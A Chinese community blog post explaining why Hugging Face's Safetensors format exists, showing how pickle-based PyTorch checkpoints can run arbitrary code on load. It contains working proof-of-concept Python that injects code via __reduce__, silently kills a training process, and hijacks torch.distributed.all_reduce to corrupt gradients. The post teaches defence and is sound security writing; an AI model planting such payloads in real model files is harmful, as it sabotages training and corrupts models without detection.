社区供稿 | 为什么我们需要 Hugging Face 的 Safetensors?

文摘   2024-10-20 10:11   美国  

作者: 李升桂,原文链接:https://franklee.xyz/blogs/2024-10-19-safetensor

很久很久以前,当我阅读大量 Hugging Face 文档时,一个非常简单的问题浮现在我的脑海中——Hugging Face 的 Safetensors 是做什么用的?“Safetensors”这个词在 Hugging Face 的文档中多次出现,但人们很少讨论它的目的。

最近发生了一起安全事件,影响了某个团队的模型训练进度,这促使我重新思考这个问题,并撰写这篇博客。需要注意的是,这篇博客并不是对该事件的讨论,而是从技术角度倡导使用 Safetensors 来保护模型的安全性,因为在 AI 时代,模型是最重要的资产

  • Hugging Face Safetensors 文档https://hf.co/docs/safetensors/en/index

当前的模型存储方式有什么问题?

当我们训练模型时,通常会将模型的权重保存到文件中,以便在检查点保存和稍后加载。最流行的格式是 PyTorch 的状态字典,它是一个 Python 字典对象,将每一层映射到其参数 tensor。我猜大多数人对以下代码片段都很熟悉:

# 保存模型权重
state_dict = model.state_dict()
torch.save(state_dict, "model.pt")

# 加载模型权重
state_dict = torch.load("model.pt")
model.load_state_dict(state_dict)

然而,这种方法使用 pickle 来序列化和反序列化整个状态字典对象,引发了安全性问题。原因在于 pickle 并不安全,可能会加载具有与反序列化程序相同权限的任意代码。攻击者可以通过模型权重注入任意代码,造成严重的安全问题。一种攻击模型权重的方法是修改其 __reduce__ 方法来执行任意代码。

class Obj:

    def __reduce__(self):
        return (exec, ("print('hello')",))

如果你将此对象序列化并保存到文件中,那么加载对象时代码就会执行。也就是说,当你加载对象时,你会看到打印出的 "hello"。

有了这个概念,我们基本上可以操控程序的许多部分,包括导入的库和本地变量。我提供了两个典型场景,展示如何中断训练过程以及篡改模型权重的算术正确性。你也可以在我的博客笔记中找到示例代码。

  • 作者的博客笔记https://github.com/FrankLeeeee/Blog-Notes/tree/main/2024-10-19-safetensor

场景 1:自动终止训练过程

如上例中的 "hello" 一样,恶意代码可以编写为一个代码字符串。同样,我们可以准备如下代码字符串,创建一个新线程,该线程在 5 秒后终止父进程。此线程在后台运行,因此用户不会注意到任何异常,而 os.kill 不返回错误日志,这使得检测恶意代码变得更加困难。

AUTO_SHUTDOWN = """
import os
import threading
from functools import partial

# 获取进程 ID
pid = os.getpid()

def inject_code(pid: int):
    import time
    import os
    time.sleep(5)
    os.kill(pid, 9)

wrapped_fn = partial(inject_code, pid)
injection_thread = threading.Thread(target=wrapped_fn)
injection_thread.start()
"""

接下来,我们需要将此代码注入到状态字典对象中。结果是,当我们从磁盘加载模型权重时,代码会执行,训练过程会被中断。

def inject_malicious_code(obj, code_str):
    # 绑定一个 reduce 函数到权重上
    def reduce(self):
        return (exec, (code_str, ))

    # 将 reduce 函数绑定到权重的 __reduce__ 方法上
    bound_reduce = reduce.__get__(obj, obj.__class__)
    setattr(obj, "__reduce__", bound_reduce)
    return obj

state_dict = inject_malicious_code(state_dict, AUTO_SHUTDOWN)

场景 2:在集合通信中引入错误

类似地,如果我们想修改集合通信操作的行为,可以在计算过程中引入错误,使得分布式训练中的梯度永远不正确。我们可以准备如下代码字符串,劫持 all_reduce 函数。这个代码字符串对 torch.distributed 模块中的 all_reduce API 进行猴子补丁,并对 tensor 执行加 1 操作。结果是 all-reduce 的结果会比预期结果大。

HIJACK_ALL_REDUCE = """
import torch.distributed as dist

dist._origin_all_reduce = dist.all_reduce
def hijacked_all_reduce(tensor, *args, **kwargs):
    import torch.distributed as dist
    tensor = tensor.add_(1)
    return dist._origin_all_reduce(tensor, *args, **kwargs)

setattr(dist, "all_reduce", hijacked_all_reduce)
"""

例如,如果你有两个进程,每个进程持有 tensor [0, 1, 2, 3],all-reduce 操作会将各个进程的 tensor 相加,结果是 [0, 2, 4, 6]。然而,如果攻击者注入了恶意代码,结果将变为 [2, 4, 6, 8]

Safetensors 如何解决问题?

首先,Safetensors 不使用 pickle 来序列化和反序列化状态字典对象。相反,它使用自定义的序列化方法来存储模型权重。这样,攻击者无法将任意代码注入到模型权重中。更为惊人的是,Safetensors 在存储和保存模型权重时仍然保持了快速零拷贝的特性。简单来说,Hugging Face 的 Safetensors 确保你的模型权重文件只包含参数数据,而不包含其他任何内容。

我还展示了一些使用 Safetensors 的示例,帮助消除安全隐患,详见我的博客笔记。对于每个演示恶意场景的例子,你只需在命令中添加 --use-safetensor 标志即可看到差异。

博客笔记地址:
https://github.com/FrankLeeeee/Blog-Notes/tree/main/2024-10-19-safetensor

此外,如果你仍希望使用 torch.load,可以指定参数 weights_only,这样 PyTorch 将限制 unpickler 只解包元数据和 tensor。

参考资料

https://www.reddit.com/r/learnpython/comments/ewrcuc/how_do_you_run_code_while_unpickling/https://hf.co/docs/safetensors/en/index




本文由 Hugging Face 中文社区内容共建项目提供,稿件由社区成员投稿,经授权发布于 Hugging Face 公众号。
原作者:李升桂,请访问博客原文了解更多https://franklee.xyz/blogs/2024-10-19-safetensor如果你有与开源 AI、Hugging Face 相关的技术和实践分享内容,以及最新的开源 AI 项目发布,希望通过我们分享给更多 AI 从业者和开发者们,请通过下面的链接投稿与我们取得联系:
https://hf.link/tougao

Hugging Face
The AI community building the future.
 最新文章